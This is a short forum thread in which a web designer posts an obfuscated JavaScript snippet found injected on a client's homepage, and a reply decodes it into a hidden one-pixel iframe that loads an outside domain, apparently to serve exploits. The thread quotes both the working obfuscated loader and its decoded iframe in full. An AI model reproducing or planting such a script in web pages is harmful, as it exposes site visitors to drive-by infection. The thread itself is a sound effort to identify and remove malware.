Hi guys, I'm a webdesigner. One of my clients often updates his website himself. While working on the site today, I found this javascript on his homepage. I didn't put it there, and wonder what it does. Last year I found viruses on his homepage and neither he nor I know how they got there. Does this script do something malicious, or is it there for a reason? This is the mystery javascript: <script language="JavaScript">e = '0x00' + '25';str1 = "%9E%C6%CD%D0%BA%D7%D6%DD%CE%C1%99%84%D0%CD%D7%CD%C4%CD%CE%CD%D6%DD%9C%C2%CD%C6%C6%C1%C8%84%98%9E%CD%C0%D4%C5%C9%C1%BA%D7%D4%C7%99%84%C2%D6%D6%CA%9C%8B%8B%C3%C6%C0%C7%C8%D6%88%CD%C8%C0%CB%8B%CE%C6%8B%D1%CA%CE%8B%84%BA%D3%CD%C6%D6%C2%99%95%BA%C2%C1%CD%C3%C2%D6%99%95%98%9E%8B%CD%C0%D4%C5%C9%C1%98%9E%8B%C6%CD%D0%98";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script> Code (markup): Any enlightenment would be most welcome! best, Denise
As a general rule 1. If neither one of you put it there, its probably not there for a reason. 2. If the javascript is obfuscated, it is probably malicious. More specifically addressing what your mysterious code is up to: <div style="visibility:hidden"><iframe src="http://gdfcnt.info/ld/upl/" width=1 height=1></iframe></div> Code (markup): I can't tell you exactly what that site is doing, but typically scripts like that download exploits to your computer.